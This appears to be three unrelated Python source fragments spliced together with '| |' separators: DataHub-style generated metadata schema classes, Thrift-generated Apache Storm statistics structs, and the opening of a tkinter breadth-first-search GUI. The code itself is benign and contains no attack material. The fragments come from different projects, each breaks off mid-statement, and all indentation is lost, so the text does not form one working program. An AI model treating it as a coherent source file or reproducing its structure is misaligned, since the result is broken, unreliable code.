def sources(self, value: List[str]) -> None:
"""Setter: Source of the MLPrimaryKey"""
self._inner_dict['sources'] = value
class MetricsClass(DictWrapper):
"""Metrics to be featured for the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.Metrics")
def __init__(self,
performanceMeasures: Union[None, List[str]]=None,
decisionThreshold: Union[None, List[str]]=None,
):
super().__init__()
self.performanceMeasures = performanceMeasures
self.decisionThreshold = decisionThreshold
@classmethod
def construct_with_defaults(cls) -> "MetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.performanceMeasures = self.RECORD_SCHEMA.field_map["performanceMeasures"].default
self.decisionThreshold = self.RECORD_SCHEMA.field_map["decisionThreshold"].default
@property
def performanceMeasures(self) -> Union[None, List[str]]:
"""Getter: Measures of MLModel performance"""
return self._inner_dict.get('performanceMeasures') # type: ignore
@performanceMeasures.setter
def performanceMeasures(self, value: Union[None, List[str]]) -> None:
"""Setter: Measures of MLModel performance"""
self._inner_dict['performanceMeasures'] = value
@property
def decisionThreshold(self) -> Union[None, List[str]]:
"""Getter: Decision Thresholds used (if any)?"""
return self._inner_dict.get('decisionThreshold') # type: ignore
@decisionThreshold.setter
def decisionThreshold(self, value: Union[None, List[str]]) -> None:
"""Setter: Decision Thresholds used (if any)?"""
self._inner_dict['decisionThreshold'] = value
class QuantitativeAnalysesClass(DictWrapper):
"""Quantitative analyses should be disaggregated, that is, broken down by the chosen factors. Quantitative analyses should provide the results of evaluating the MLModel according to the chosen metrics, providing confidence interval values when possible."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses")
def __init__(self,
unitaryResults: Union[None, str]=None,
intersectionalResults: Union[None, str]=None,
):
super().__init__()
self.unitaryResults = unitaryResults
self.intersectionalResults = intersectionalResults
@classmethod
def construct_with_defaults(cls) -> "QuantitativeAnalysesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.unitaryResults = self.RECORD_SCHEMA.field_map["unitaryResults"].default
self.intersectionalResults = self.RECORD_SCHEMA.field_map["intersectionalResults"].default
@property
def unitaryResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
return self._inner_dict.get('unitaryResults') # type: ignore
@unitaryResults.setter
def unitaryResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
self._inner_dict['unitaryResults'] = value
@property
def intersectionalResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
return self._inner_dict.get('intersectionalResults') # type: ignore
@intersectionalResults.setter
def intersectionalResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
self._inner_dict['intersectionalResults'] = value
class SourceCodeClass(DictWrapper):
"""Source Code"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCode")
def __init__(self,
sourceCode: List["SourceCodeUrlClass"],
):
super().__init__()
self.sourceCode = sourceCode
@classmethod
def construct_with_defaults(cls) -> "SourceCodeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.sourceCode = list()
@property
def sourceCode(self) -> List["SourceCodeUrlClass"]:
"""Getter: Source Code along with types"""
return self._inner_dict.get('sourceCode') # type: ignore
@sourceCode.setter
def sourceCode(self, value: List["SourceCodeUrlClass"]) -> None:
"""Setter: Source Code along with types"""
self._inner_dict['sourceCode'] = value
class SourceCodeUrlClass(DictWrapper):
"""Source Code Url Entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl")
def __init__(self,
type: Union[str, "SourceCodeUrlTypeClass"],
sourceCodeUrl: str,
):
super().__init__()
self.type = type
self.sourceCodeUrl = sourceCodeUrl
@classmethod
def construct_with_defaults(cls) -> "SourceCodeUrlClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = SourceCodeUrlTypeClass.ML_MODEL_SOURCE_CODE
self.sourceCodeUrl = str()
@property
def type(self) -> Union[str, "SourceCodeUrlTypeClass"]:
"""Getter: Source Code Url Types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "SourceCodeUrlTypeClass"]) -> None:
"""Setter: Source Code Url Types"""
self._inner_dict['type'] = value
@property
def sourceCodeUrl(self) -> str:
"""Getter: Source Code Url"""
return self._inner_dict.get('sourceCodeUrl') # type: ignore
@sourceCodeUrl.setter
def sourceCodeUrl(self, value: str) -> None:
"""Setter: Source Code Url"""
self._inner_dict['sourceCodeUrl'] = value
class SourceCodeUrlTypeClass(object):
# No docs available.
ML_MODEL_SOURCE_CODE = "ML_MODEL_SOURCE_CODE"
TRAINING_PIPELINE_SOURCE_CODE = "TRAINING_PIPELINE_SOURCE_CODE"
EVALUATION_PIPELINE_SOURCE_CODE = "EVALUATION_PIPELINE_SOURCE_CODE"
class TrainingDataClass(DictWrapper):
"""Ideally, the MLModel card would contain as much information about the training data as the evaluation data. However, there might be cases where it is not feasible to provide this level of detailed information about the training data. For example, the data may be proprietary, or require a non-disclosure agreement. In these cases, we advocate for basic details about the distributions over groups in the data, as well as any other details that could inform stakeholders on the kinds of biases the model may have encoded."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.TrainingData")
def __init__(self,
trainingData: List["BaseDataClass"],
):
super().__init__()
self.trainingData = trainingData
@classmethod
def construct_with_defaults(cls) -> "TrainingDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.trainingData = list()
@property
def trainingData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for training the MLModel"""
return self._inner_dict.get('trainingData') # type: ignore
@trainingData.setter
def trainingData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for training the MLModel"""
self._inner_dict['trainingData'] = value
class MetadataAuditEventClass(DictWrapper):
"""Kafka event for capturing update made to an entity's metadata."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataAuditEvent")
def __init__(self,
newSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
oldSnapshot: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]=None,
):
super().__init__()
self.auditHeader = auditHeader
self.oldSnapshot = oldSnapshot
self.newSnapshot = newSnapshot
@classmethod
def construct_with_defaults(cls) -> "MetadataAuditEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.oldSnapshot = self.RECORD_SCHEMA.field_map["oldSnapshot"].default
self.newSnapshot = ChartSnapshotClass.construct_with_defaults()
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def oldSnapshot(self) -> Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('oldSnapshot') # type: ignore
@oldSnapshot.setter
def oldSnapshot(self, value: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['oldSnapshot'] = value
@property
def newSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('newSnapshot') # type: ignore
@newSnapshot.setter
def newSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['newSnapshot'] = value
class MetadataChangeEventClass(DictWrapper):
"""Kafka event for proposing a metadata change for an entity. A corresponding MetadataAuditEvent is emitted when the change is accepted and committed, otherwise a FailedMetadataChangeEvent will be emitted instead."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataChangeEvent")
def __init__(self,
proposedSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
proposedDelta: None=None,
):
super().__init__()
self.auditHeader = auditHeader
self.proposedSnapshot = proposedSnapshot
self.proposedDelta = proposedDelta
@classmethod
def construct_with_defaults(cls) -> "MetadataChangeEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.proposedSnapshot = ChartSnapshotClass.construct_with_defaults()
self.proposedDelta = self.RECORD_SCHEMA.field_map["proposedDelta"].default
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def proposedSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the proposed metadata change. Include | |
TType.DOUBLE:
self.complete_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('SpoutAggregateStats')
if self.complete_latency_ms is not None:
oprot.writeFieldBegin('complete_latency_ms', TType.DOUBLE, 1)
oprot.writeDouble(self.complete_latency_ms)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.complete_latency_ms)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class BoltAggregateStats:
"""
Attributes:
- execute_latency_ms
- process_latency_ms
- executed
- capacity
"""
thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'execute_latency_ms', None, None, ), # 1
(2, TType.DOUBLE, 'process_latency_ms', None, None, ), # 2
(3, TType.I64, 'executed', None, None, ), # 3
(4, TType.DOUBLE, 'capacity', None, None, ), # 4
)
def __init__(self, execute_latency_ms=None, process_latency_ms=None, executed=None, capacity=None,):
self.execute_latency_ms = execute_latency_ms
self.process_latency_ms = process_latency_ms
self.executed = executed
self.capacity = capacity
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.execute_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.process_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.executed = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.capacity = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('BoltAggregateStats')
if self.execute_latency_ms is not None:
oprot.writeFieldBegin('execute_latency_ms', TType.DOUBLE, 1)
oprot.writeDouble(self.execute_latency_ms)
oprot.writeFieldEnd()
if self.process_latency_ms is not None:
oprot.writeFieldBegin('process_latency_ms', TType.DOUBLE, 2)
oprot.writeDouble(self.process_latency_ms)
oprot.writeFieldEnd()
if self.executed is not None:
oprot.writeFieldBegin('executed', TType.I64, 3)
oprot.writeI64(self.executed)
oprot.writeFieldEnd()
if self.capacity is not None:
oprot.writeFieldBegin('capacity', TType.DOUBLE, 4)
oprot.writeDouble(self.capacity)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.execute_latency_ms)
value = (value * 31) ^ hash(self.process_latency_ms)
value = (value * 31) ^ hash(self.executed)
value = (value * 31) ^ hash(self.capacity)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class SpecificAggregateStats:
"""
Attributes:
- bolt
- spout
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bolt', (BoltAggregateStats, BoltAggregateStats.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'spout', (SpoutAggregateStats, SpoutAggregateStats.thrift_spec), None, ), # 2
)
def __init__(self, bolt=None, spout=None,):
self.bolt = bolt
self.spout = spout
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bolt = BoltAggregateStats()
self.bolt.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.spout = SpoutAggregateStats()
self.spout.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('SpecificAggregateStats')
if self.bolt is not None:
oprot.writeFieldBegin('bolt', TType.STRUCT, 1)
self.bolt.write(oprot)
oprot.writeFieldEnd()
if self.spout is not None:
oprot.writeFieldBegin('spout', TType.STRUCT, 2)
self.spout.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.bolt)
value = (value * 31) ^ hash(self.spout)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ComponentAggregateStats:
"""
Attributes:
- type
- common_stats
- specific_stats
- last_error
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'type', None, None, ), # 1
(2, TType.STRUCT, 'common_stats', (CommonAggregateStats, CommonAggregateStats.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'specific_stats', (SpecificAggregateStats, SpecificAggregateStats.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'last_error', (ErrorInfo, ErrorInfo.thrift_spec), None, ), # 4
)
def __init__(self, type=None, common_stats=None, specific_stats=None, last_error=None,):
self.type = type
self.common_stats = common_stats
self.specific_stats = specific_stats
self.last_error = last_error
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.type = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.common_stats = CommonAggregateStats()
self.common_stats.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.specific_stats = SpecificAggregateStats()
self.specific_stats.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.last_error = ErrorInfo()
self.last_error.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ComponentAggregateStats')
if self.type is not None:
oprot.writeFieldBegin('type', TType.I32, 1)
oprot.writeI32(self.type)
oprot.writeFieldEnd()
if self.common_stats is not None:
oprot.writeFieldBegin('common_stats', TType.STRUCT, 2)
self.common_stats.write(oprot)
oprot.writeFieldEnd()
if self.specific_stats is not None:
oprot.writeFieldBegin('specific_stats', TType.STRUCT, 3)
self.specific_stats.write(oprot)
oprot.writeFieldEnd()
if self.last_error is not None:
oprot.writeFieldBegin('last_error', TType.STRUCT, 4)
self.last_error.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.type)
value = (value * 31) ^ hash(self.common_stats)
value = (value * 31) ^ hash(self.specific_stats)
value = (value * 31) ^ hash(self.last_error)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TopologyStats:
"""
Attributes:
- window_to_emitted
- window_to_transferred
- window_to_complete_latencies_ms
- window_to_acked
- window_to_failed
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'window_to_emitted', (TType.STRING,None,TType.I64,None), None, ), # 1
(2, TType.MAP, 'window_to_transferred', (TType.STRING,None,TType.I64,None), None, ), # 2
(3, TType.MAP, 'window_to_complete_latencies_ms', (TType.STRING,None,TType.DOUBLE,None), None, ), # 3
(4, TType.MAP, 'window_to_acked', (TType.STRING,None,TType.I64,None), None, ), # 4
(5, TType.MAP, 'window_to_failed', (TType.STRING,None,TType.I64,None), None, ), # 5
)
def __init__(self, window_to_emitted=None, window_to_transferred=None, window_to_complete_latencies_ms=None, window_to_acked=None, window_to_failed=None,):
self.window_to_emitted = window_to_emitted
self.window_to_transferred = window_to_transferred
self.window_to_complete_latencies_ms = window_to_complete_latencies_ms
self.window_to_acked = window_to_acked
self.window_to_failed = window_to_failed
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.window_to_emitted = {}
(_ktype316, _vtype317, _size315 ) = iprot.readMapBegin()
for _i319 in xrange(_size315):
_key320 = iprot.readString().decode('utf-8')
_val321 = iprot.readI64()
self.window_to_emitted[_key320] = _val321
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.window_to_transferred = {}
(_ktype323, _vtype324, _size322 ) = iprot.readMapBegin()
for _i326 in xrange(_size322):
_key327 = iprot.readString().decode('utf-8')
_val328 = iprot.readI64()
self.window_to_transferred[_key327] = _val328
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.MAP:
self.window_to_complete_latencies_ms = {}
(_ktype330, _vtype331, _size329 ) = iprot.readMapBegin()
for _i333 in xrange(_size329):
_key334 = iprot.readString().decode('utf-8')
_val335 = iprot.readDouble()
self.window_to_complete_latencies_ms[_key334] = _val335
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.window_to_acked = {}
(_ktype337, _vtype338, _size336 ) = iprot.readMapBegin()
for _i340 in xrange(_size336):
_key341 = iprot.readString().decode('utf-8')
_val342 = iprot.readI64()
self.window_to_acked[_key341] = _val342
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.MAP:
self.window_to_failed = {}
(_ktype344, _vtype345, _size343 ) = iprot.readMapBegin()
for _i347 in xrange(_size343):
_key348 = iprot.readString().decode('utf-8')
_val349 = iprot.readI64()
self.window_to_failed[_key348] = _val349
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TopologyStats')
if self.window_to_emitted is not None:
oprot.writeFieldBegin('window_to_emitted', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.I64, len(self.window_to_emitted))
for kiter350,viter351 in self.window_to_emitted.items():
oprot.writeString(kiter350.encode('utf-8'))
oprot.writeI64(viter351)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.window_to_transferred is not None:
oprot.writeFieldBegin('window_to_transferred', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.I64, len(self.window_to_transferred))
for kiter352,viter353 in self.window_to_transferred.items():
oprot.writeString(kiter352.encode('utf-8'))
oprot.writeI64(viter353)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.window_to_complete_latencies_ms is not | |
from tkinter import *
import tkinter.font as font
from functions import *
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
import string
from tkinter.ttk import Separator, Style
# Main Application Class
class BreadthFirstSearch:
def __init__(self, master):
self.master = master
master.geometry("900x550")
master.title("Breadth First Search")
master.configure(bg="white")
master.iconbitmap("images/bfs-icon.ico")
# Fonts
font1 = font.Font(family='Helvetica', size=10, weight='bold')
font2 = font.Font(family="Times", size=10, slant="italic", weight='bold')
font3 = font.Font(family="Komika", size=10, slant="italic", weight='bold')
# Color
self.color_menu = "#FCA85A"
self.color_main_content = "#FDE69F"
self.color_red = "#ED5C5E"
# Instances
self.alphabets = list(string.ascii_uppercase + string.ascii_lowercase)
self.optionButton = False
self.optionInput = 0
self.isFileRead = False
self.isFileSelected = False
self.listOfFile = list()
self.filepath = ""
self.numVertices = 0 # Default at Runtime is 0
self.column = 0
self.row = 0
self.isMatrixValide = True # To check whether the matrix contains only 1 and 0
self.NameVertices = list() # Names Of Vertices
self.NameVerticesIndex = 0
self.isNameOk = False
self.isMatrixOk = False
self.start = ""
self.end = ""
# Images
self.QuestionImage = PhotoImage(file="images/problem-solving.png")
self.InputImage = PhotoImage(file="images/input.png")
self.ChoiceImage = PhotoImage(file="images/choose.png")
self.ProcessingImage = PhotoImage(file="images/planning.png")
self.IntroductionImage = PhotoImage(file="images/large.png")
self.GraphImage = PhotoImage(file="images/graph.png")
self.UploadImage = PhotoImage(file="images/upload.png")
self.PathFindingImage = PhotoImage(file="images/road-map.png")
self.RunImage = PhotoImage(file="images/button_run.png")
self.ClearImage = PhotoImage(file="images/button_clear.png")
self.ButtonStart = PhotoImage(file="images/button_start.png")
self.ButtonValidate = PhotoImage(file="images/button_validate.png")
self.ButtonOpenFile = PhotoImage(file="images/button_open-file.png")
self.ButtonReadFile = PhotoImage(file="images/button_read-file.png")
self.ButtonBack = PhotoImage(file="images/button_back.png")
self.ButtonNext = PhotoImage(file="images/button_next.png")
self.ButtonRunAlgorithm = PhotoImage(file="images/button_run-algorithm.png")
self.ButtonExit = PhotoImage(file="images/button_exit.png")
self.ButtonReset = PhotoImage(file="images/button_reset.png")
## Declaring Frames
self.frameLeft = Frame(master, bg=self.color_menu)
self.frameLeft.place(relx=0, rely=0, relwidth=0.2, relheight=1)
self.frameRight = Frame(master, bg=self.color_main_content)
self.frameRight.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
# self.frameRight.place_forget()
self.frameRight1 = Frame(master, bg=self.color_main_content)
self.frameRight1.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight1.place_forget()
self.frameRight2 = Frame(master, bg=self.color_main_content)
self.frameRight2.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight2.place_forget()
self.frameRight4 = Frame(master, bg=self.color_main_content)
self.frameRight4.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight4.place_forget()
self.frameRight3 = Frame(master, bg=self.color_main_content)
self.frameRight3.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight3.place_forget()
self.frameRight4 = Frame(master, bg=self.color_main_content)
self.frameRight4.place(relx=0.2, rely=0, relwidth=0.8, relheight=1)
self.frameRight4.place_forget()
## Putting the menu of the program on the leftframe
# Question Button
self.questionButton = MyMenu(self.frameLeft, 0, 0, 1, 0.25, self.color_main_content, self.QuestionImage)
# Input Button
self.inputButton = MyMenu(self.frameLeft, 0, 0.25, 1, 0.25, self.color_menu, self.InputImage)
# Choice Button
self.choiceButton = MyMenu(self.frameLeft, 0, 0.5, 1, 0.25, self.color_menu, self.ChoiceImage)
# Processing Button
